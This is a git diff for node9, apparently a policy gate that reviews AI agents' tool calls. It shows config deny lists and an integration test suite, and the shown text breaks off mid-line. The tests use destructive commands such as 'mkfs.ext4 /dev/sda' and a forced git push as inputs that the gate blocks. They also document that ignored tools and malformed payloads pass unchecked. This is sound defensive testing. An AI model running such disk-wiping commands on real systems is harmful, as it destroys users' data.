diff --git a/node9.config.json_ b/node9.config.json_ deleted file mode 100644 index b04906f..0000000 --- a/node9.config.json_ +++ /dev/null @@ -1,90 +0,0 @@ -{ - "version": "1.0", - "settings": { - "mode": "standard" - }, - "policy": { - "dangerousWords": [ - "drop", - "destroy", - "purge", - "rmdir", - "push", - "force" - ], - "ignoredTools": [ - "list_*", - "get_*", - "read_*", - "describe_*", - "read", - "write", - "edit", - "multiedit", - "glob", - "grep", - "ls", - "notebookread", - "notebookedit", - "todoread", - "todowrite", - "webfetch", - "websearch", - "exitplanmode", - "askuserquestion", - "agent", - "task*" - ], - "toolInspection": { - "bash": "command", - "shell": "command", - "run_shell_command": "command", - "terminal.execute": "command" - }, - "rules": [ - { - "action": "rm", - "allowPaths": [ - "**/node_modules/**", - "**/node_modules", - "dist/**", - "dist", - "build/**", - "build", - ".next/**", - ".next", - ".nuxt/**", - ".nuxt", - "coverage/**", - "coverage", - ".cache/**", - ".cache", - "tmp/**", - "tmp", - "temp/**", - "temp", - "**/__pycache__/**", - "**/__pycache__", - "**/.pytest_cache/**", - "**/.pytest_cache", - "**/*.log", - "**/*.tmp", - ".DS_Store", - "**/yarn.lock", - "**/package-lock.json", - "**/pnpm-lock.yaml" - ] - } - ] - }, - "environments": { - "production": { - "requireApproval": true, - "slackChannel": "#general" - }, - "development": { - "requireApproval": true, - "slackChannel": "#general" - } - } -} diff --git a/node9.config.json__ b/node9.config.json__ deleted file mode 100644 index b0f6339..0000000 --- a/node9.config.json__ +++ /dev/null @@ -1,93 +0,0 @@ -{ - "version": "1.0", - "settings": { - "mode": "standard", - "approvers": { - "native": false - } - }, - "policy": { - "dangerousWords": [ - "drop", - "destroy", - "purge", - "rmdir", - "push", - "force" - ], - "ignoredTools": [ - "list_*", - "get_*", - "read_*", - "describe_*", - "read", - "write", - "edit", - "multiedit", - "glob", - "grep", - "ls", - 
"notebookread", - "notebookedit", - "todoread", - "todowrite", - "webfetch", - "websearch", - "exitplanmode", - "askuserquestion", - "agent", - "task*" - ], - "toolInspection": { - "bash": "command", - "shell": "command", - "run_shell_command": "command", - "terminal.execute": "command" - }, - "rules": [ - { - "action": "rm", - "allowPaths": [ - "**/node_modules/**", - "**/node_modules", - "dist/**", - "dist", - "build/**", - "build", - ".next/**", - ".next", - ".nuxt/**", - ".nuxt", - "coverage/**", - "coverage", - ".cache/**", - ".cache", - "tmp/**", - "tmp", - "temp/**", - "temp", - "**/__pycache__/**", - "**/__pycache__", - "**/.pytest_cache/**", - "**/.pytest_cache", - "**/*.log", - "**/*.tmp", - ".DS_Store", - "**/yarn.lock", - "**/package-lock.json", - "**/pnpm-lock.yaml" - ] - } - ] - }, - "environments": { - "production": { - "requireApproval": true, - "slackChannel": "#general" - }, - "development": { - "requireApproval": true, - "slackChannel": "#general" - } - } -} diff --git a/package-lock.json b/package-lock.json index 63e63c4..7c1e37e 100644 --- a/package-lock.json +++ b/package-lock.json @@ -14,7 +14,8 @@ "commander": "^14.0.3", "execa": "^9.6.1", "picomatch": "^4.0.3", - "sh-syntax": "^0.5.8" + "sh-syntax": "^0.5.8", + "zod": "^3.25.76" }, "bin": { "node9": "dist/cli.js" @@ -9529,6 +9530,15 @@ "funding": { "url": "https://github.com/sponsors/sindresorhus" } + }, + "node_modules/zod": { + "version": "3.25.76", + "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", + "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/colinhacks" + } } } } diff --git a/package.json b/package.json index 9553da6..2c8db0b 100644 --- a/package.json +++ b/package.json @@ -70,7 +70,8 @@ "commander": "^14.0.3", "execa": "^9.6.1", "picomatch": "^4.0.3", - "sh-syntax": "^0.5.8" + "sh-syntax": "^0.5.8", + "zod": "^3.25.76" }, 
"devDependencies": { "@anthropic-ai/sdk": "^0.78.0", diff --git a/src/__tests__/check.integration.test.ts b/src/__tests__/check.integration.test.ts new file mode 100644 index 0000000..2a1ab24 --- /dev/null +++ b/src/__tests__/check.integration.test.ts @@ -0,0 +1,744 @@ +/** + * Integration tests for `node9 check` CLI command. + * + * These tests spawn the real built CLI subprocess (`dist/cli.js`) with an + * isolated HOME directory so each test controls the exact config in play. + * No mocking — the full pipeline from JSON parsing → policy evaluation → + * authorizeHeadless → exit code runs as-is. + * + * Requirements: + * - `npm run build` must be run before these tests (the suite checks for dist/cli.js) + * - Tests set NODE9_NO_AUTO_DAEMON=1 to prevent daemon auto-start side effects + * - Tests set NODE9_TESTING=1 to disable interactive approval UI (terminal/browser/native + * racers return early so tests complete without waiting for human input) + * - Tests set HOME to a tmp directory per test group to isolate config state + */ + +import { describe, it, expect, beforeAll, beforeEach, afterEach } from 'vitest'; +import { spawnSync, spawn } from 'child_process'; +import fs from 'fs'; +import os from 'os'; +import path from 'path'; +import http from 'http'; + +// ── Helpers ─────────────────────────────────────────────────────────────────── + +const CLI = path.resolve(__dirname, '../../dist/cli.js'); + +interface RunResult { + status: number | null; + stdout: string; + stderr: string; +} + +/** + * Synchronous runner — safe only when no in-process mock server is involved, + * because spawnSync blocks the event loop (preventing the mock server from + * responding to requests from the child process). + * + * cwd defaults to os.tmpdir() (not the project root) so the subprocess never + * picks up the repo's own node9.config.json and inherits only the HOME config + * written by makeTempHome(). Pass tmpHome explicitly to keep both HOME and cwd + * consistent. 
+ */ +function runCheck( + payload: object | string, + env: Record = {}, + cwd = os.tmpdir(), + timeoutMs = 8000 +): RunResult { + const payloadArg = typeof payload === 'string' ? payload : JSON.stringify(payload); + const result = spawnSync(process.execPath, [CLI, 'check', payloadArg], { + encoding: 'utf-8', + timeout: timeoutMs, + cwd, // avoid loading the repo's own node9.config.json + env: { + ...process.env, + NODE9_NO_AUTO_DAEMON: '1', + NODE9_TESTING: '1', + ...env, + }, + }); + return { + status: result.status, + stdout: result.stdout ?? '', + stderr: result.stderr ?? '', + }; +} + +/** + * Async runner using spawn — required when the test hosts a mock HTTP server + * in the same process, since spawnSync would block the event loop and prevent + * the server from handling requests from the child. + * + * Accepts either an object (serialized to JSON) or a raw string (passed as-is), + * allowing tests to exercise the CLI's JSON-parse error path. + */ +function runCheckAsync( + payload: object | string, + env: Record = {}, + cwd = os.tmpdir(), + timeoutMs = 8000 +): Promise { + const payloadArg = typeof payload === 'string' ? 
payload : JSON.stringify(payload); + return new Promise((resolve) => { + // Guard against double-resolve: child.on('close') fires even after child.kill() + let resolved = false; + const settle = (result: RunResult) => { + if (!resolved) { + resolved = true; + resolve(result); + } + }; + + const child = spawn(process.execPath, [CLI, 'check', payloadArg], { + cwd, + env: { + ...process.env, + NODE9_NO_AUTO_DAEMON: '1', + NODE9_TESTING: '1', + ...env, + }, + }); + + let stdout = ''; + let stderr = ''; + child.stdout.on('data', (d: Buffer) => (stdout += d.toString())); + child.stderr.on('data', (d: Buffer) => (stderr += d.toString())); + + const timer = setTimeout(() => { + child.kill(); + settle({ status: null, stdout, stderr }); + }, timeoutMs); + + child.on('close', (code) => { + clearTimeout(timer); + settle({ status: code, stdout, stderr }); + }); + }); +} + +/** Write a config.json into a temp HOME `.node9` directory. Returns the HOME path. */ +function makeTempHome(config: object): string { + const tmpHome = fs.mkdtempSync(path.join(os.tmpdir(), 'node9-test-')); + const node9Dir = path.join(tmpHome, '.node9'); + fs.mkdirSync(node9Dir, { recursive: true }); + fs.writeFileSync(path.join(node9Dir, 'config.json'), JSON.stringify(config)); + return tmpHome; +} + +/** Write raw text (may be invalid JSON) directly into the config file. */ +function makeTempHomeRaw(content: string): string { + const tmpHome = fs.mkdtempSync(path.join(os.tmpdir(), 'node9-test-')); + const node9Dir = path.join(tmpHome, '.node9'); + fs.mkdirSync(node9Dir, { recursive: true }); + fs.writeFileSync(path.join(node9Dir, 'config.json'), content); + return tmpHome; +} + +function cleanupHome(tmpHome: string) { + fs.rmSync(tmpHome, { recursive: true, force: true }); +} + +// ── Pre-flight: ensure the binary is built ──────────────────────────────────── + +beforeAll(() => { + if (!fs.existsSync(CLI)) { + throw new Error( + `dist/cli.js not found. 
Run "npm run build" before running integration tests.\nExpected: ${CLI}` + ); + } +}); + +// ── 1. Ignored tools → fast-path allow ─────────────────────────────────────── + +describe('ignored tools fast-path', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('glob is ignored → approved with no block output', () => { + const r = runCheck( + { tool_name: 'glob', tool_input: { pattern: '**/*.ts' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + // "glob" is an ignored tool — no review message, just silently allowed + expect(r.stderr).not.toContain('blocked'); + }); + + it('read is ignored → approved', () => { + const r = runCheck( + { tool_name: 'read', tool_input: { file_path: '/tmp/test.txt' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); + + it('webfetch is ignored → approved', () => { + const r = runCheck( + { tool_name: 'webfetch', tool_input: { url: 'https://example.com' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); + + it('task* wildcard — task_drop_all_tables is fast-pathed to allow', () => { + // "task*" is in ignoredTools; a tool name that looks dangerous but matches + // the pattern must still be silently allowed (the pattern is opt-in by the user) + const r = runCheck( + { tool_name: 'task_drop_all_tables', tool_input: {} }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); // no block JSON + expect(r.stderr).not.toContain('blocked'); + }); + + it('task* wildcard + dangerous word in input → ignoredTools wins (silently allowed)', () => { + // Security note: ignoredTools is an explicit opt-in by the operator. 
When a tool + // matches an ignoredTools pattern, it is fast-pathed BEFORE dangerousWords are + // evaluated. This is intentional — ignoredTools means "trust this tool completely". + // Operators should not add write-capable or destructive tools to ignoredTools unless + // they are certain those tools are safe. The test below documents this precedence. + const r = runCheck( + { tool_name: 'task_execute', tool_input: { query: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); // no block JSON — ignoredTools took precedence + expect(r.stderr).not.toContain('blocked'); + }); +}); + +// ── 2. Smart rules ──────────────────────────────────────────────────────────── + +describe('smart rules', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + smartRules: [ + { + name: 'block-force-push', + tool: 'bash', + conditions: [ + { field: 'command', op: 'matches', value: 'git push.*(--force|-f\\b)', flags: 'i' }, + ], + conditionMode: 'all', + verdict: 'block', + reason: 'Force push blocked by policy', + }, + { + name: 'allow-readonly-bash', + tool: 'bash', + conditions: [ + { + field: 'command', + op: 'matches', + value: '^\\s*(ls|cat|grep|find|echo)', + flags: 'i', + }, + ], + conditionMode: 'all', + verdict: 'allow', + reason: 'Read-only command', + }, + ], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('force push → blocked with JSON decision:block in stdout', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'git push origin main --force' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); // CLI always exits 0; block is communicated via stdout JSON + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + 
expect(r.stderr).toContain('blocked'); + }); + + it('readonly bash → allowed with checkedBy in stderr', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la /tmp' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toContain('allowed'); + }); +}); + +// ── 3. Dangerous words ──────────────────────────────────────────────────────── + +describe('dangerous words', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + dangerousWords: ['mkfs', 'shred'], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('command with mkfs → blocked (no approval mechanism → block)', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sdb' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + expect(r.stderr).toContain('blocked'); + }); + + it('safe command without dangerous word → allowed', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'echo hello world' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + // Should either be silently allowed (empty stdout) or show "allowed" + if (r.stdout.trim()) { + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).not.toBe('block'); + } + }); +}); + +// ── 4. 
No approval mechanism ────────────────────────────────────────────────── + +describe('no approval mechanism', () => { + let tmpHome: string; + beforeEach(() => { + // All approvers off, no cloud API key — any "review" verdict has nowhere to go + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { + dangerousWords: ['mkfs'], + }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('risky tool with no mechanism → blocked JSON output', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + const parsed = JSON.parse(r.stdout.trim()); + expect(parsed.decision).toBe('block'); + }); +}); + +// ── 5. Audit mode ───────────────────────────────────────────────────────────── + +describe('audit mode', () => { + let tmpHome: string; + beforeEach(() => { + tmpHome = makeTempHome({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + }); + afterEach(() => cleanupHome(tmpHome)); + + it('risky tool in audit mode → allowed with checkedBy:audit', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toContain('[audit]'); + expect(r.stderr).toContain('allowed'); + }); + + it('non-flagged tool in audit mode → approved silently', () => { + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + }); +}); + +// ── 6. 
Audit mode + cloud gating (auditLocalAllow) ──────────────────────────── + +describe('audit mode + cloud gating', () => { + let tmpHome: string; + let mockServer: http.Server; + let auditCalls: object[]; + let serverPort: number; + + beforeEach(async () => { + auditCalls = []; + await new Promise((resolve) => { + mockServer = http.createServer((req, res) => { + let body = ''; + req.on('data', (chunk) => (body += chunk)); + req.on('end', () => { + if (req.url === '/audit' && req.method === 'POST') { + try { + auditCalls.push(JSON.parse(body)); + } catch { + /* ignore */ + } + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ ok: true })); + } else { + res.writeHead(404); + res.end(); + } + }); + }); + mockServer.listen(0, '127.0.0.1', () => { + serverPort = (mockServer.address() as { port: number }).port; + resolve(); + }); + }); + + tmpHome = makeTempHome({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + // Write credentials pointing at our mock server + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key-123', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + }); + + afterEach(async () => { + cleanupHome(tmpHome); + await new Promise((resolve) => mockServer.close(() => resolve())); + }); + + it('audit mode + cloud:true + API key → POSTs to /audit endpoint', async () => { + // auditLocalAllow is awaited in core.ts before process.exit(0), so by the + // time runCheckAsync resolves (process closed) the POST is already complete. + // No sleep needed — if it races here, it's a production bug too. 
+ const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toContain('[audit]'); + expect(auditCalls.length).toBeGreaterThan(0); + }); + + it('audit mode + cloud:false → does NOT POST to /audit', async () => { + // Overwrite config with cloud:false + fs.writeFileSync( + path.join(tmpHome, '.node9', 'config.json'), + JSON.stringify({ + settings: { + mode: 'audit', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: false, terminal: false }, + }, + policy: { dangerousWords: ['mkfs'] }, + }) + ); + + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toContain('[audit]'); + expect(auditCalls.length).toBe(0); + }); +}); + +// ── 7. Config validation — malformed JSON ───────────────────────────────────── + +describe('config validation — malformed JSON', () => { + let tmpHome: string; + afterEach(() => cleanupHome(tmpHome)); + + it('literal newline in JSON string → warning on stderr + falls back to defaults', () => { + // Create a JSON file with a literal newline inside a string value (like the real bug) + const badJson = + '{"settings":{"mode":"standard"},"policy":{"smartRules":[{"name":"bad","tool":"bash","conditions":[{"field":"command","op":"matches","value":"^ls\n"}],"verdict":"allow"}]}}'; + tmpHome = makeTempHomeRaw(badJson); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + // Should warn about parse failure + expect(r.stderr).toMatch(/Failed to parse|Invalid config|Using default/i); + }); + + it('completely invalid JSON → warning on stderr + exits cleanly', () => { + tmpHome = makeTempHomeRaw('not valid json at all {{{'); + + const r = runCheck( + { tool_name: 'bash', 
tool_input: { command: 'ls -la' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Failed to parse|Using default/i); + }); +}); + +// ── 8. Config validation — Zod schema warnings ─────────────────────────────── + +describe('config validation — Zod schema warnings', () => { + let tmpHome: string; + afterEach(() => cleanupHome(tmpHome)); + + it('unknown top-level key → Zod warning on stderr', () => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + unknownKey: 'should-warn', + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|unknown/i); + }); + + it('invalid mode value → Zod warning on stderr', () => { + tmpHome = makeTempHome({ + settings: { mode: 'bad-mode', autoStartDaemon: false }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|mode/i); + }); + + it('invalid smart rule op → Zod warning', () => { + tmpHome = makeTempHome({ + settings: { mode: 'standard', autoStartDaemon: false }, + policy: { + smartRules: [ + { + tool: 'bash', + conditions: [{ field: 'command', op: 'invalid-op', value: 'ls' }], + verdict: 'allow', + }, + ], + }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + expect(r.stderr).toMatch(/Invalid config|op/i); + }); + + it('valid config → no Zod warnings', () => { + tmpHome = makeTempHome({ + version: '1.0', + settings: { mode: 'standard', autoStartDaemon: false }, + policy: { dangerousWords: ['mkfs'] }, + }); + + const r = runCheck( + { tool_name: 'bash', tool_input: { command: 'ls' } }, + { HOME: tmpHome }, + tmpHome + ); + expect(r.status).toBe(0); + 
expect(r.stderr).not.toMatch(/Invalid config|Failed to parse/i); + }); +}); + +// ── 9. Cloud race engine (mock SaaS) ───────────────────────────────────────── + +describe('cloud race engine', () => { + let tmpHome: string; + let mockServer: http.Server; + let serverPort: number; + + function startMockSaas(decision: 'allow' | 'deny'): Promise { + return new Promise((resolve) => { + mockServer = http.createServer((req, res) => { + let body = ''; + req.on('data', (c) => (body += c)); + req.on('end', () => { + if (req.url === '/' && req.method === 'POST') { + // Initial check submission → signal pending, return a requestId for polling + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ pending: true, requestId: 'mock-request-id' })); + } else if (req.url?.startsWith('/status/') && req.method === 'GET') { + // Status poll → return final status in the format the poller expects + const status = decision === 'allow' ? 'APPROVED' : 'DENIED'; + res.writeHead(200, { 'Content-Type': 'application/json' }); + res.end(JSON.stringify({ status, approvedBy: 'test@example.com' })); + } else { + res.writeHead(404); + res.end(); + } + }); + }); + mockServer.listen(0, '127.0.0.1', () => { + serverPort = (mockServer.address() as { port: number }).port; + resolve(); + }); + }); + } + + afterEach(async () => { + cleanupHome(tmpHome); + if (mockServer) await new Promise((resolve) => mockServer.close(() => resolve())); + }); + + it('cloud approves → allowed with checkedBy:cloud', async () => { + await startMockSaas('allow'); + + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + approvalTimeoutMs: 3000, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + + const r = await 
runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome, + 10000 + ); + expect(r.status).toBe(0); + expect(r.stdout).toBe(''); + expect(r.stderr).toMatch(/\[cloud\].*allowed/i); + }); + + it('cloud denies → blocked JSON output', async () => { + await startMockSaas('deny'); + + tmpHome = makeTempHome({ + settings: { + mode: 'standard', + autoStartDaemon: false, + approvers: { native: false, browser: false, cloud: true, terminal: false }, + approvalTimeoutMs: 3000, + }, + policy: { dangerousWords: ['mkfs'] }, + }); + + fs.writeFileSync( + path.join(tmpHome, '.node9', 'credentials.json'), + JSON.stringify({ apiKey: 'test-key', apiUrl: `http://127.0.0.1:${serverPort}` }) + ); + + const r = await runCheckAsync( + { tool_name: 'bash', tool_input: { command: 'mkfs.ext4 /dev/sda' } }, + { HOME: tmpHome }, + tmpHome, + 10000 + ); + expect(r.status).toBe(0); + const denied = JSON.parse(r.stdout.trim()); + expect(denied.decision).toBe('block'); + }); +}); + +// ── 10. Malformed payload to `node9 check` ─────────────────────────────────── + +describe('malformed JSON payload', () => { + // The CLI argument is a trust boundary: any process can call `node9 check `. + // + // Design decision: malformed payloads "fail open" (exit 0, no block output). + // Rationale: hooks run inline before every tool call; a transient JSON serialization + // error (e.g. payload truncated mid-send) must NOT block the user's AI session. + // The failure is logged to ~/.node9/hook-debug.log when NODE9_DEBUG=1. + // + // These tests verify the failure is graceful (no uncaught exception / stack trace). 
+ + it('non-JSON string → fails open (exit 0, no crash)', () => { + const r = runCheck('not-valid-json', {}, os.tmpdir()); + expect(r.status).toBe(0); // fail-open: allow rather than hard-block on parse error + expect(r.stderr).not.toContain('TypeError'); + expect(r.stderr).not.toContain('at Object.'); + }); + + it('empty string payload → fails open (exit 0, no crash)', () => { + const r = runCheck('', {}, os.tmpdir()); + expect(r.status).toBe(0); + expect(r.stderr).not.toContain('TypeError'); + expect(r.stderr).not.toContain('at Object.'); + }); + + it('partial JSON object → fails open (exit 0, no crash)', () => { + const r = runCheck('{"tool_name":"bash"', {}, os.tmpdir()); + expect(r.status).toBe(0); + expect(r.stderr).not.toContain('TypeError'); + }); +}); diff --git a/src/__tests__/cli_runner.test.ts b/src/__tests__/cli_runner.test.ts index d9574b9..089ead4 100644 --- a/src/__tests__/cli_runner.test.ts +++ b/src/__tests__/cli_runner.test.ts @@ -113,8 +113,9 @@ describe('smart runner — shell command policy', () => { }); it('blocks when command contains dangerous word in path', async () => { + // mkfs is in DANGEROUS_WORDS — triggers review even as a token in a find command const result = await evaluatePolicy('shell', { - command: 'find . 
-name "*.log" -exec purge {} +', + command: 'find /dev -name "sd*" -exec mkfs.ext4 {} +', }); expect(result.decision).toBe('review'); }); @@ -130,8 +131,8 @@ describe('smart runner — shell command policy', () => { describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { it('returns noApprovalMechanism when no API key, no daemon, no TTY', async () => { mockNoNativeConfig(); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -140,11 +141,11 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - // Changed 'delete_user' -> 'drop_user' - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'allow' }) : '' + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + String(p) === decisionsPath ? JSON.stringify({ mkfs_disk: 'allow' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(true); }); @@ -152,11 +153,11 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { const decisionsPath = path.join('/mock/home', '.node9', 'decisions.json'); existsSpy.mockImplementation((p) => String(p) === decisionsPath); readSpy.mockImplementation((p) => - // Changed 'delete_user' -> 'drop_user' - String(p) === decisionsPath ? JSON.stringify({ drop_user: 'deny' }) : '' + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + String(p) === decisionsPath ? 
JSON.stringify({ mkfs_disk: 'deny' }) : '' ); - const result = await authorizeHeadless('drop_user', {}); + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); }); }); @@ -166,8 +167,8 @@ describe('autoStartDaemon: false — blocks without daemon when no TTY', () => { describe('daemon abandon fallthrough', () => { it('returns noApprovalMechanism when daemon is not running and no other channels', async () => { mockNoNativeConfig(); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); expect(result.noApprovalMechanism).toBe(true); }); @@ -193,8 +194,8 @@ describe('daemon abandon fallthrough', () => { }) ); - // Changed 'delete_user' -> 'drop_user' - const result = await authorizeHeadless('drop_user', {}); + // Use mkfs_disk — contains mkfs (in DANGEROUS_WORDS) so triggers review + const result = await authorizeHeadless('mkfs_disk', {}); expect(result.approved).toBe(false); }); }); diff --git a/src/__tests__/context-sniper.test.ts b/src/__tests__/context-sniper.test.ts new file mode 100644 index 0000000..1207dfc --- /dev/null +++ b/src/__tests__/context-sniper.test.ts @@ -0,0 +1,250 @@ +import { describe, it, expect } from 'vitest'; +import { extractContext, smartTruncate, computeRiskMetadata } from '../context-sniper.js'; + +// ── smartTruncate ───────────────────────────────────────────────────────────── + +describe('smartTruncate', () => { + it('returns the string unchanged when it is within the limit', () => { + const s = 'hello world'; + expect(smartTruncate(s, 500)).toBe(s); + }); + + it('returns the string unchanged when it is exactly the limit', () => { + const s = 'a'.repeat(500); + expect(smartTruncate(s, 500)).toBe(s); + }); + + it('truncates long strings and inserts " ... 
" in the middle', () => { + const s = 'a'.repeat(600); + const result = smartTruncate(s, 500); + expect(result).toContain(' ... '); + expect(result.length).toBeLessThan(s.length); + }); + + it('keeps the start and end of a long string', () => { + const s = 'START' + 'x'.repeat(600) + 'END'; + const result = smartTruncate(s, 500); + expect(result.startsWith('START')).toBe(true); + expect(result.endsWith('END')).toBe(true); + }); + + it('uses 500 as the default maxLen', () => { + const s = 'x'.repeat(600); + const result = smartTruncate(s); + expect(result).toContain(' ... '); + }); +}); + +// ── extractContext ──────────────────────────────────────────────────────────── + +describe('extractContext', () => { + /** Build a string with N lines, each being "line_N". */ + function makeLines(count: number): string { + return Array.from({ length: count }, (_, i) => `line_${i + 1}`).join('\n'); + } + + it('returns full text when it has 7 or fewer lines', () => { + const text = makeLines(7); + const { snippet, lineIndex } = extractContext(text, 'line_4'); + expect(snippet).toBe(text); + expect(lineIndex).toBe(-1); + }); + + it('returns full text (truncated) when no matchedWord is given', () => { + const text = makeLines(20); + const { lineIndex } = extractContext(text); + expect(lineIndex).toBe(-1); + }); + + it('returns a 7-line window centred on the matched word', () => { + const text = makeLines(20); // "line_1\nline_2\n..." 
+ // 'line_10' is at index 9 (0-based); window should be 7 content lines + const { snippet } = extractContext(text, 'line_10'); + // Content lines contain 'line_N'; head/tail markers contain 'hidden' + const contentLines = snippet.split('\n').filter((l) => l.includes('line_')); + expect(contentLines.length).toBe(7); + expect(contentLines.some((l) => l.includes('line_10'))).toBe(true); + }); + + it('marks the hit line with the 🛑 emoji', () => { + const text = makeLines(20); + const { snippet } = extractContext(text, 'line_10'); + // The 🛑 marker should appear exactly once on the hit line + const markedLine = snippet.split('\n').find((l) => l.startsWith('🛑')); + expect(markedLine).toBeDefined(); + expect(markedLine).toContain('line_10'); + }); + + it('lineIndex is the 0-based offset of the hit line within the extracted window', () => { + const text = makeLines(20); + const { snippet, lineIndex } = extractContext(text, 'line_15'); + // lineIndex is relative to the content window (head prefix is separate). + // The content window lines are those that include 'line_' (not the head/tail markers). + expect(lineIndex).toBeGreaterThanOrEqual(0); + const windowLines = 